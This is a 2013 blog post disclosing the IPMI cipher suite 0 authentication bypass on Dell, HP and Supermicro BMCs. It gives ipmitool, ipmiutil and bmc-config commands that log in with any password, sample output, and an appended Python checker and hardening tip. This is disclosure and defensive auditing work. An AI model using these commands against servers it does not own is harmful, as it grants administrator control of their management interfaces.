Feb 22 2013

Now, a few words on looking for things. When you go looking for something specific, your chances of finding it are very bad. Because of all the things in the world, you’re only looking for one of them. When you go looking for anything at all, your chances of finding it are very good. Because of all the things in the world, you’re sure to find some of them.

– Daryl Zero, The Zero Effect

The Zero Effect is a weird, quirky movie about a detective I can relate to, although I’m not as smart. How many times have I looked for that one thing, and then found something more important that had nothing to do with it? Sometimes you simply have to keep your eyes open.

The short version – Cipher Zero is the first cipher in the IPMI 2.0 spec. It allows you to authenticate to IPMI without a password – in other words, it’s really no cipher at all, or the un-cipher. It removes all security from IPMI. But who cares, really? Surely vendors wouldn’t turn this on by default, would they? Well… it’s enabled on my Dell (iDRAC 6), HP (iLO 3), and Supermicro. Those are all the systems I have access to; presumably there are more. (Important note – it does need a valid user and IPMI channel for it to work, so mostly it wouldn’t work until the box was provisioned or turned on with at least one user.)

Longer version: let’s see, to belabor the obvious. To execute an IPMI command, you can use good ol’ bmc-config with the proper authentication:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p calvin -h --checkout | grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

You know, that line of output is not good. How not good is “not good”? Well, let’s try it again… this time with “FluffyWabbit” as the password:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p FluffyWabbit -h --checkout | grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

I guess this is neat. Or sad. Or something. You can try other passwords to verify FluffyWabbit isn’t some vendor hardcoded backdoor ;)

I believe that IBM, as of the M2/Nehalem generation, has essentially abolished cipher zero through the efforts of Jarred B Johnson (kudos to both!). I’m not sure who else still has this going on… but you might check your own boxes. It’d be interesting to hear about the vendors that do have this on or off by default.


DISCLAIMER – various versions of the IPMI utilities – including bmc-config – WILL FAIL and give FALSE results! They do not work correctly with cipher 0 and will fail; this misled me early on with my own boxes. The latest version of freeipmi seems to work on all the ones I’ve tested, at least; make sure you have downloaded the latest copy and try this to verify good ol’ cipher 0 is still around.

Most commands say they support it; ensure you have the latest version, since bugs abound out there in the tools and/or in the BMCs, but bmc-config seems pretty solid on this. Some other options for popular utilities:

$ ipmitool -I lanplus -C 0 -H -U admin -P FluffyWabbit lan print

$ ipmiutil lan -J 0 -N -U admin -P FluffyBunny

Ipmiutil has a nice printing of the results – anything in the RMCP+ line that looks like a zero is bad :)

$ ipmitool -I lanplus -C 0 -H -U root -P calvin lan print
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5
                        : User     : MD2 MD5
                        : Operator : MD2 MD5
                        : Admin    : MD2 MD5
                        : OEM      :
IP Address Source       : Static Address
IP Address              :
Subnet Mask             :
MAC Address             : 14:fe:b5:c7:df:28
SNMP Community String   : public
IP Header               : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
Default Gateway IP      :
Default Gateway MAC     : 00:00:00:00:00:00
Backup Gateway IP       :
Backup Gateway MAC      : 00:00:00:00:00:00
802.1q VLAN ID          : Disabled
802.1q VLAN Priority    : 0
RMCP+ Cipher Suites     : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     u=USER
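
For checking your own boxes in bulk, here is an added example (not from the original post or from ipmitool itself) that reads saved `ipmitool lan print` output and reports the maximum privilege the BMC grants through cipher suite 0. The function names are hypothetical, the sample text is constructed from the two relevant lines above, and the letter legend and the "position i = suite ID i" mapping are assumed from ipmitool's documented cipher_privs convention.

```python
# ipmitool's one-letter legend for the "Cipher Suite Priv Max" field.
PRIV = {"X": "UNUSED", "c": "CALLBACK", "u": "USER",
        "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}


def _field(lan_print, name):
    """Return the value of a 'Name : value' line from `lan print`, or None."""
    for line in lan_print.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == name:
            return value.strip()
    return None


def cipher_zero_privilege(lan_print):
    """Return the max privilege reachable through cipher suite 0, or None.

    None means suite 0 is not advertised or is marked unused (X).
    Assumption: character i of Priv Max belongs to cipher suite ID i,
    the convention ipmitool documents for its cipher_privs setting.
    """
    suites = _field(lan_print, "RMCP+ Cipher Suites")
    privs = _field(lan_print, "Cipher Suite Priv Max")
    if suites is None or not privs:
        raise ValueError("RMCP+ cipher suite fields not found in input")
    advertised = {int(s) for s in suites.split(",") if s.strip().isdigit()}
    if 0 not in advertised:
        return None
    level = PRIV.get(privs[0])
    if level is None:
        raise ValueError(f"unknown privilege letter {privs[0]!r}")
    return None if level == "UNUSED" else level


# Constructed samples: the two relevant lines as printed above, and a
# variant where suite 0 has been set to X (unused).
EXPOSED = """\
RMCP+ Cipher Suites : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14
Cipher Suite Priv Max : aaaaaaaaaaaaaaa
"""
HARDENED = EXPOSED.replace("aaaaaaaaaaaaaaa", "Xaaaaaaaaaaaaaa")

if __name__ == "__main__":
    for name, text in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, "->", cipher_zero_privilege(text) or "cipher 0 not usable")
```

This only reports what the BMC says its configuration is; given the tool and BMC bugs mentioned above, the wrong-password test remains the confirmation. On BMCs that honour it, `ipmitool lan set <channel> cipher_privs` with `X` in the first position is the setting that marks suite 0 unused.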
